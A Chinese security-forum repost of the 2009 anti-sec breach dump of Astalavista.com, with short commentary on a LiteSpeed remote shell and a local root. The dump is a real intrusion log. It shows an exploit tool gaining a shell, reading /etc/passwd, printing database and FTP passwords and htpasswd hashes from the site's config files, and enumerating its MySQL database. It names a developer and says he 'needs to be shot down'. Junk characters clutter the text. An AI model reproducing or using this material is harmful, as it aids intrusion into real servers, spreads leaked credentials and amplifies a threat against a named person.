中国网络渗透测试联盟

标题: Astalavista被蹂躏过程 [打印本页]

---

作者: admin    时间: 2012-11-6 21:07
标题: Astalavista被蹂躏过程
里面两个亮点，一是远程获得apache用户权限的shell，banner是LiteSpeed，看来这玩意有0day，但是又怎么是用apache用户跑的，原来LiteSpeed这东西是和apache绑一起的，大概看了下介绍，主要功能是anti-ddos，这东西貌似还有点意思，回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
- b2 a' {2 H# \) B5 [
) t2 ?/ U8 F" S3 M2 o5 U, l1 I[root@front3 ~]# curl -I litespeedtech.com
8 y' e' V" Y0 x6 W" ]# [HTTP/1.1 200 OK
Date: Fri, 05 Jun 2009 22:54:51 GMT
Server: LiteSpeed

另外一个亮点就是localroot了，如果不是udev的话，那么就是RHEL5.3  x64还有一个localroot 0day -_-

有人说astalavista被黑是因为Y拿milw0rm的东西赚钱，这个我觉得就是每个人的尺度问题，有人还把别人写的文章弄成自己写的，还有人把别人的程序改成自己的，多了去了。
2 z( S1 n  ]! R& r7 y& v% F
) E0 F% c0 L- ~0 [. U: n! u4 i
6 Y" G* |6 {- i/ B/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \
/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \
/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /
" l; R9 e6 }& X. U* X        \/        \/                 \/        \/       \/                     \/                 \/
                                  The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group
7 z6 F& D% c: ^3 D% N: S. a. z
9 G' ~6 z. L) u( {3 {5 l3 L. p& o/ ]From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
>> 03. Who’s behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.

; s2 B& O9 x8 k3 l3 |: Y! v>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
- {/ M; \+ ?$ C- P: F% E9 H$ s; smilitary institutions.
% n4 e0 `* X! w$ w>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.

5 G$ f1 m! ~; v+ u! d" SWhy has Astalavista been targeted?
: ^) i4 K7 @0 G/ w: p
Other than the fact that they are not doing any of this for the “community” but
. j7 r. P- a! U5 T* e" J" qfor the money, they spread exploits for kids, claim to be a security community
(with no real sense of security on their own servers), and they charge you $6.66
per months to access a dead forum with a directory filled with public releases
and outdated / broken services.

We wanted to see how good that “team of security and IT professionals” really is.
( r/ ~1 J# Q" z* [7 B5 r
Let’s begin.
0 l9 k% x7 G; @! `) Z
. I$ Z5 Z6 _  `8 T; Uanti-sec:~# ./g0tshell astalavista.com -p 80
* A, l7 r, u( p6 W[+] Connecting to astalavista.com:80
! `( S" U. J: @[+] Grabbing banner…
LiteSpeed
; z9 A) J# O, k4 O( v[+] Injecting shellcode…
[-] Wait for it

[~] We g0tshell
/ d1 w0 X7 M2 r( z' yuname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)
3 Z& _1 e# D5 i' ~( k( m! Y
sh-3.2$ cat /etc/passwd
7 f* f- _+ a, k8 X% K5 V+ }. l$ Oroot:x:0:0:root:/root:/bin/bash
% H. q! o7 P; G/ obin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
! z: h. T  o+ [6 xadm:x:3:4:adm:/var/adm:/sbin/nologin
6 ^7 v0 G7 Q) r9 q" r( ?lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+ {* C( _7 `" a: C! l. }sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+ w* U* O. `! O. s+ n- w. whalt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
/ ?0 n9 y2 d5 Z' [uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
* Q: f- t0 `9 roperator:x:11:0perator:/root:/sbin/nologin
  M7 N' O7 Z6 U0 W( i; ?: ngames:x:12:100:games:/usr/games:/sbin/nologin
! B* V; ^. y! M7 A4 s1 @6 cgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
1 {/ G2 a, \0 Q! mftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
; I& `. X( F& Inobody:x:99:99:Nobody:/:/sbin/nologin
/ ]1 m4 @, B1 d4 P$ y+ h. n" qrpm:x:37:37::/var/lib/rpm:/sbin/nologin
( w8 g0 L. \# [4 A6 z' gdbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
7 T  T, B* K3 fmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
4 Z6 h8 Y0 J7 q6 `. [4 [/ `. Vsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
+ c; ]) X# d; Rvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
; X6 G  ^" O" X6 L  erpc:x:32:32ortmapper RPC user:/:/sbin/nologin
( s( R2 \0 N: K. u: o' i( orpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
. h/ g& `3 Q3 r$ ~nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+ y- o3 C9 h2 |5 c0 g/ R/ d# Psshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
; J3 n' a! w. N) R# m$ ], l( Zpcap:x:77:77::/var/arpwatch:/sbin/nologin
9 O+ Z9 C7 l' D0 pnamed:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
) e) e* p! k: ]! h  Rdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
/ S7 o  h6 G. _4 Y5 |mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
: F) R, X+ q2 I% Vwebapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
jon:x:502:503::/home/jon:/bin/bash
+ m. ]; [% s! [0 S9 acom:x:503:504::/home/com:/bin/bash
) v& _. s) y) p* wntp:x:38:38::/etc/ntp:/sbin/nologin
+ |4 f1 V: I' n3 lais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
$ a4 X9 s. T: D6 H+ n4 fastanet:x:504:505::/home/astanet:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

5 {; k" v& v* c- g# O4 Ish-3.2$ cat /etc/hosts
+ k7 b$ [9 {4 F/ O; o# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1       localhost.localdomain   localhost
::1     localhost6.localdomain6 localhost6
. v9 i6 m0 d$ _) s2 F! A80.74.154.172           asta1.astalavistaserver.com
2 N( M9 g* F0 W
sh-3.2$ pwd
/home/com/public_html

sh-3.2$ ls -la
' D& n) U% g3 o- k2 T& D, ftotal 18460
4 l) Y3 H3 w) {: adrwxr-xr-x 30 com apache     4096 May 28 17:06 .
9 q, h! z8 b. S' j9 V  ^drwx–x–x 11 com com        4096 Jun 25  2008 ..
$ ^" ?# ~5 A" h& Wdrwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
* }- C8 U7 W- H! ?/ u% Udrwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
drwxrwxrwx  2 com com        4096 May 19 00:50 config
& P7 K* o0 i. |1 ^' @4 tdrwxr-xr-x  2 com com        4096 Mar 20 11:05 core
drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules
drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing
drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__
-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php
drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor
-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico
drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
# M5 c% O: m) s* [0 X! U: r. U, {3 ^-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess
-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak
-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak
( n) v& i9 M6 E6 ^drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool
drwxrwxrwx 14 com com        4096 Feb  2 19:29 images
* ?( d; i$ I4 r, @8 y5 y-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php
  R8 v+ H7 R; t3 z' wdrwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
1 @2 K% c6 H/ N; ~drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang
2 |" c% x4 u. \2 L- X: rdrwxr-xr-x 22 com com        4096 Feb  2 19:29 lib
drwxrwxrwx 12 com com        4096 Jun  2 07:47 media
6 ]. k7 c; w0 adrwxr-xr-x  8 com com        4096 May 11 12:48 modifications
drwxr-xr-x 34 com com        4096 May 28 16:30 modules
drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin
% N6 I; q) \/ D( Hdrwxrwxr-x 22 com com        4096 May 28 17:06 _new
- G3 `2 ~2 M% ?" h, i2 Ldrwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
1 }0 h+ i* N2 V6 q" P* Edrwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy
/ q. x2 y9 J. G: e- I+ ^$ m# zdrwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
. F4 h& f, N. B2 I+ S* N) k7 {. k, d# v-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt
-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml
-rw-r–r–  1 com com         223 Mar 30 15:32 test.php
drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp
* M! X' i; {( o, @* ~. odrwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam
- `7 `# c7 u2 ?8 t
* u' m. r) `5 X* G1 w- u* N- Msh-3.2$ head -20 index.php
$ e) k' g6 O, I  _5 O<?php
( w8 E  l& Z  m( T) x# N. A! ]
/**
! k* q/ E& C* A6 |2 ]$ p2 R# V+ e* The main page for the CMS
* @copyright   CONTREXX CMS - COMVATION AG
" i5 \! ]3 |$ W3 }# _" n4 k/ I* @author      Comvation Development Team
* @version     v1.0.9.10.1 stable
* @package        contrexx
  `0 }! N" X; g7 k* @subpackage    core
' C3 j2 _( x3 O. l" z/ ~* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
9 D; O6 U) B! x9 i  i* @since       v0.0.0.0
* @todo        Capitalize all class names in project
7 X: G9 N8 j+ j) w# O* @uses        /config/configuration.php
# W8 Z1 K/ Q5 I2 m5 h* @uses        /config/settings.php
* @uses        /config/version.php
& K7 w, G* U1 U- s* @uses        /core/API.php
* @uses        /core_modules/cache/index.class.php
* @uses        /core/error.class.php
+ I  r, {$ @  j; P* @uses        /core_modules/banner/index.class.php
* @uses        /core_modules/contact/index.class.php
( x# V( [6 w. f% g  r! v" S7 ~
. ]) d: V# w; x4 e# z0 @sh-3.2$ cd config/
sh-3.2$ ls -la
total 32
+ s. W. f* S  y1 j, bdrwxrwxrwx  2 com com    4096 May 19 00:50 .
9 v& j( [8 h: [6 f: j/ _drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php
. e- b- q/ }, q! i; b-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php
-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php
-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php
5 V7 b. r! D" p+ Y: J' s
sh-3.2$ cat configuration.php
[snip]
: h6 h6 X# ~; Q% x8 A$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
" z- y8 X& Z2 ]4 x3 j$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
1 X8 H" H3 I+ \8 h" F$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
' p3 b, ?( J6 _2 w$ Y+ E  `$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
5 ]0 S# e0 E- }  I  S8 @- K$ z$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
# ^" ^0 x% y, |3 b, v[snip]
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode
$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost
2 p9 @+ O- M4 ]$_FTPCONFIG['port'] = 21; // Ftp remote port
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
  Y* q, V# n+ s* _4 n7 _( [$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms
* {& j* V; h2 n' X
" ~' J- R9 [' {# Psh-3.2$ cd ..
sh-3.2$ cd dvd/
sh-3.2$ ls -la
. r4 m6 U6 ^# stotal 2913780
drwxr-xr-x  2 com com          4096 Sep  9  2008 .
7 d# p; v# W' Z* _drwxr-xr-x 30 com apache       4096 May 28 17:06 ..
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar
0 g3 E3 w" e$ ~2 \7 ~3 x- h/ S-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar
-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar
-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess

- z; y" i( V8 z% E1 tsh-3.2$ cat .htaccess
authType Basic
  v( d2 E+ Q2 s7 |/ t( QauthName DVD
9 z2 t2 k! \+ ^3 P6 R, P. p/ Q: [" KauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
require valid-user

3 a4 V+ l6 P# D! s1 Msh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
DVDdownload:CRD8cuY6.MPT6
" |0 P8 C1 l4 K0 V9 [7 }9 ]% aDVDdownload2:CR8a36.wluFMg
! A) T4 w3 r; d3 {2 W, ]
sh-3.2$ cat test.php
<?php
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));
echo $url;
  h& |0 a, b- l; W4 s?>
5 a# @; _" m. ]& R
7 L/ @# r1 l% }/ Rsh-3.2$ cd modifications/
sh-3.2$ ls -la
! |9 s! ]& f, ]: {  X' ]total 32
drwxr-xr-x  8 com com    4096 May 11 12:48 .
5 m+ Y" i. x4 p' v; i5 ~drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng
drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs
3 o8 c1 ]% k3 D$ f/ ydrwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools
drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
- |1 x# ~# l' j* Edrwxr-xr-x  2 com com    4096 Feb  2 19:33 search
drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
; [# o0 F, Z7 L$ d
sh-3.2$ ls -R
3 I* f, ?% u, B/ x! s! K4 A6 q.:
& V% [. {7 \. X( b3 c" wcom_avtng  cronjobs  onlinetools  pjirc  search  _tmp
3 |- _/ W' W& B
./com_avtng:
avtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts

2 M/ L: w7 ^: \: O  C  D4 x7 p! V8 m./com_avtng/scripts:
3 [+ a5 p" ~+ ^3 p$ |0 P9 f) ^5 A# kpopunder.js
- {* d" b4 H; s0 V
./cronjobs:
* `( _) ]8 K; Aexploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp

* j* _) M0 ?8 S  I* v7 w./cronjobs/tmp:
contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
3 @) N7 R. @) ^3 ^  J
7 S7 f  `" O9 E4 Z, x) B. ^6 _./onlinetools:
index.php
& V" X( A3 H# m. r0 V
./pjirc:
9 B1 B/ y5 I6 J6 Na_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt
AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt
background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
) p- S' l0 v) \! B+ W8 T- U$ r
./pjirc/img:
ange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif
arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   
8 n) `' h0 R, {( V$ y1 s! s) m, t7 c; s3 Mverre-eau.gif
, d( B7 m9 |. Q' Vargh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  
verre-vin.gif
0 Z* |% b7 t, j  @, \ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif
. Y9 V3 e" `; ~. j) b- m7 Bbiere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif
( ?" r5 j7 ]. l: i& G
./pjirc/snd:
+ _2 A$ K) f" V/ P7 e$ H3 ^; K6 f. d5 qbell2.au  ding.au
$ C- r# M3 w* J3 u4 ?2 k
./search:
searchEngines.php  search.php

' C7 Q! H  c9 J./_tmp:
defaultPorts.php  defaultPorts.txt
3 J7 |# Y- J1 y( G  ?
# E1 d2 N! r3 w5 |; ssh-3.2$ cd cronjobs/
sh-3.2$ cat exploits.php
1 q* I  |7 E5 K8 b* T* t[snip]
# \+ n* l0 u  }& D$categories   = array();
; j! T5 C' k! L' B# ]  z/ z$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
/ A& u& F3 v" L0 M) ]2 j$expolits     = file($milw0rmFile);
$comExploits  = array();
[snip]
) z6 G  g' `6 x" e, E+ Y// manage data
$ Z+ J" @& w8 |- V; E8 |, \for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640

    // get path and title
9 s( o" @* ?7 k4 a7 M    $expolits[$x] = trim($expolits[$x]);
( W/ C, q) G$ v. G# J& Q    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);

4 H1 k& |$ E- x* S- z    // check if file exists
    if (file_exists($path)) {
6 w8 A' e3 m# `& h* n7 B
        $text = file_get_contents($path);

        // get content and date
        //$text = htmlspecialchars($text, ENT_QUOTES);
        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));
( ^' _3 W0 F* K4 O1 I        if ($tmptext != ”) {
            $text = $tmptext;
        } else {
            $text = addslashes(htmlentities($text,  ENT_QUOTES));
        }
        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
        $tmp  = explode('-', $date);
1 q* n9 x5 l6 o: X6 ~+ j        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
        $cat  = getCategory ($path);
6 R  M- X$ ^$ U        $ext  = pathinfo(basename($path));
! w- J# Q1 q& \3 U# C+ C        $ext  = $ext['extension'];
        $qStr = ”
0 I5 K5 \1 |) U' b/ R            SELECT  `id`
            FROM    `contrexx_module_exploits`
( b, p9 z+ T/ w            WHERE   `title`  =  ‘” . $title . “‘
            AND     `date`   =  ‘” . $date . “‘
% k/ j6 h. k( u$ ?8 Z: \        “;
        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
        $q = $_objDB->query($qStr);
2 X6 E3 `% x6 l
* x7 Q4 P! J" |+ v" r5 N' m& |        if ($q->numRows() == 0) {
: h- [6 ]& v& M& T) u2 u) {, p- M
" ]) ~4 w( h) |4 _3 r+ u6 _            // prepare array
            $comExploits[$x]['date']      = $date;
" n: V: o' l! ~            $comExploits[$x]['title']     = $title;
% B1 A5 ~  h: j& |0 k# M8 \            $comExploits[$x]['author']    = ‘milw0rm’;
6 Z! w+ Q/ B; i; R; Y7 u            $comExploits[$x]['text']      = $text;
            $comExploits[$x]['source']    = $ext;
% Q8 ~6 U+ D5 C! I1 ?3 F2 i* H            $comExploits[$x]['url1']      = ”;
            $comExploits[$x]['url2']      = ”;
" v) Z+ h4 A, D; O) O& w            $comExploits[$x]['catid']     = $cat;
& L7 O, t, J: |" u5 P            $comExploits[$x]['lang']      = ‘2′;
0 f/ _$ N9 R4 z$ J            $comExploits[$x]['userid']    = ‘12′;
            $comExploits[$x]['startdate'] = ‘0000-00-00′;
            $comExploits[$x]['enddate']   = ‘0000-00-00′;
            $comExploits[$x]['status']    = ‘1′;
- x4 s. t5 r3 j            $comExploits[$x]['changelog'] = $date;

        }
[snip]
9 t4 {3 g$ l  f# A% z1 ]    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
6 Q& o( r5 q6 N0 {2 t: H- f<rss version=”2.0″>
: W2 V6 @. p$ T: h8 J( R& E- k    <channel>
        <title>ASTALAVISTA.com - Exploits</title>
        <link>http://www.astalavista.com/exploits</link>
# V7 C3 j& S) R9 g/ E        <description>All availably Exploits.</description>
        <language>en-us</language>
: S$ C+ G$ l6 i" w6 r        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
        <docs>http://blogs.law.harvard.edu/tech/rss</docs>
        <generator>Astalavista.com</generator>
, ^- N( c. `/ l( t$ h7 v7 _        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
! V* X0 |9 u. T0 p    </channel>
</rss>’;

% [3 u- Y, C% r7 Y6 a/ J    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
        unlink (FULLPATH . ‘/feed/exploits.xml’);
/ o9 @0 J1 N1 w; j    }
$ n8 o" o3 ]2 S1 N' B
6 i! W7 S( o1 K- F    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
# S/ e6 H$ t4 `! E' H[snip]

( z, |4 W3 }- O* g7 zsh-3.2$ cat exploits.sh
#!/bin/sh
- q9 i- I& z$ ^
###########################################################
2 i7 g( M9 D- w/ Z" W9 ^#                                                         #
#   Title:        milw0rm exploits adder                  #
#   Description:  Add all milw0rm exploits to the         #
. S9 W' K6 G) A#                 Astalavista.com database                #
- b4 B, R, y$ T4 \' D: _& X& w6 Z' i#                                                         #
1 ~/ X  B9 j6 Q: `#   Company:      Astalavista Group                       #
# {0 i6 _0 F; L* E8 {#   Author:       Paulo M. Santos                         #
#   E-Mail:       链接标记paulo.santos@astalavista.ch             #
#                                                         #
( y% @/ W: a8 L. [###########################################################

  E+ W: x2 {' _. G0 X# path
this_path=/home/com/public_html/modifications/cronjobs
7 L1 A8 C6 A. P8 R* Z
: s  D( v2 i& X( h4 a# change directory
cd $this_path
! Y, A% f0 Z: h6 c1 zcd tmp/

# delete files
rm -rf milw0rm.tar.* &
rm -rf milw0rm/ &
* K) r* f, m* `2 Q" ?
; o& q+ A7 r$ z  }# wget milw0rm paket
& l8 ~  X. j4 u) b  v  s1 fwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
& f$ Q! {% a, n
# extract milw0rm paket
tar -xvf milw0rm.tar.bz2
# `3 R# {8 G( n) S. Z8 c; q
* G3 k# r: ^, W; X3 L5 D, G2 n* U) i# change owner
7 C- Y2 K6 ?+ g; wchown -R com .
chgrp -R com .

: Y$ U/ N1 j) G# execute php script
cd $this_path
: Z# W4 E! e$ Y2 v7 B5 Nphp -q exploits.php
" }# U% h! @1 `/ t5 [' w
5 c1 Z- W5 ]! ?, f8 q; ^6 @1 ~. @# delete files
* p7 }  p& X9 B. Z6 v% Mrm -rf tmp/milw0rm.tar.*
rm -rf tmp/milw0rm/

3 ?/ T7 i5 C7 g4 D- _6 gsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
Paulo M. Santos needs to be shot down.

mysql -u contrexxuser2 -p
7 A  e6 a; H4 Q' _Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 261694
' p1 y+ w5 n. U% E- g4 J5 {& c( |Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 z& `0 |* I4 |% X; R
mysql> show databases;
$ Y3 R: C: D! U( j' E& H+——————–+
( ^) p+ R  d4 \: ^| Database           |
' t6 d& Y* I  }) f+——————–+
( d& {) h* b3 ?3 {+ p| information_schema |
1 i" D+ I  q, l, ?  k| com_contrexx2      |
: I& s7 X. `( h- Q8 |3 j# `2 t| com_contrexx2_live |
| test               |
+——————–+
4 rows in set (0.00 sec)

# T! X+ G3 X; @mysql> use com_contrexx2_live
Database changed
( Y# ?( ~  H5 zmysql> show tables;
) C4 H, o, e  k- G- w- \+————————————————–+
| Tables_in_com_contrexx2_live                     |
+————————————————–+
| cc_banner_counter                                |
| cc_search_counter                                |
1 S) W' ~  ~) y( h4 f! E; r1 ~! @| contrexx_access_group_dynamic_ids                |
| contrexx_access_group_static_ids                 |
| contrexx_access_rel_user_group                   |
5 P1 q4 n6 G: [' {5 P1 ?| contrexx_access_settings                         |
| contrexx_access_user_attribute                   |
$ u, H$ J( x4 Z7 k1 Q3 M+ a| contrexx_access_user_attribute_name              |
) W7 s# H4 v# n7 t: Q9 `| contrexx_access_user_attribute_value             |
| contrexx_access_user_core_attribute              |
2 ^! O( K" T# \* s  f; @0 \6 t$ C| contrexx_access_user_groups                      |
| contrexx_access_user_mail                        |
) S+ o$ k- O9 Z; O8 m5 k$ e0 Z| contrexx_access_user_profile                     |
| contrexx_access_user_title                       |
| contrexx_access_user_validity                    |
| contrexx_access_users                            |
| contrexx_backend_areas                           |
$ S7 `, w2 E* q2 U) g9 A| contrexx_backups                                 |
" J" O6 G6 ~7 e: Q& H! q| contrexx_content                                 |
7 R. L& M3 P7 |, H* g( [' s0 t| contrexx_content_history                         |
| contrexx_content_logfile                         |
| contrexx_content_navigation                      |
9 l7 |8 u  ]1 \. }+ D7 T$ G- U; u| contrexx_content_navigation_history              |
" ?1 C# h& q" X: S) F: [& O8 {: ]7 H9 ~| contrexx_ids                                     |
| contrexx_languages                               |
| contrexx_lib_country                             |
$ M& ^6 H4 a  G8 T  @: N) J& Z8 n| contrexx_log                                     |
  \% Z; h- d6 q, z4 @| contrexx_module_alias_source                     |
5 z8 C& q, ?/ ^" c| contrexx_module_alias_target                     |
| contrexx_module_block_blocks                     |
& |: J! W: I+ m1 r4 K' F$ K| contrexx_module_block_rel_lang                   |
0 g5 W! D4 x% s) t| contrexx_module_block_rel_pages                  |
3 J% i' v/ |. c' T# G# y) `; F| contrexx_module_block_settings                   |
0 V- B8 R  |5 ^& }2 m1 k1 ~| contrexx_module_blog_categories                  |
( V( z, H6 _# _$ j8 v2 b: S8 ^| contrexx_module_blog_comments                    |
| contrexx_module_blog_message_to_category         |
| contrexx_module_blog_messages                    |
| contrexx_module_blog_messages_lang               |
4 A. h* B, ]. F, Q/ D| contrexx_module_blog_networks                    |
| contrexx_module_blog_networks_lang               |
| contrexx_module_blog_settings                    |
| contrexx_module_blog_votes                       |
3 a2 Z1 f% P0 G7 P, f8 Z| contrexx_module_calendar                         |
| contrexx_module_calendar_access                  |
| contrexx_module_calendar_categories              |
| contrexx_module_calendar_form_data               |
| contrexx_module_calendar_form_fields             |
5 j1 g) L5 D# q( w+ O| contrexx_module_calendar_registrations           |
| contrexx_module_calendar_settings                |
| contrexx_module_calendar_style                   |
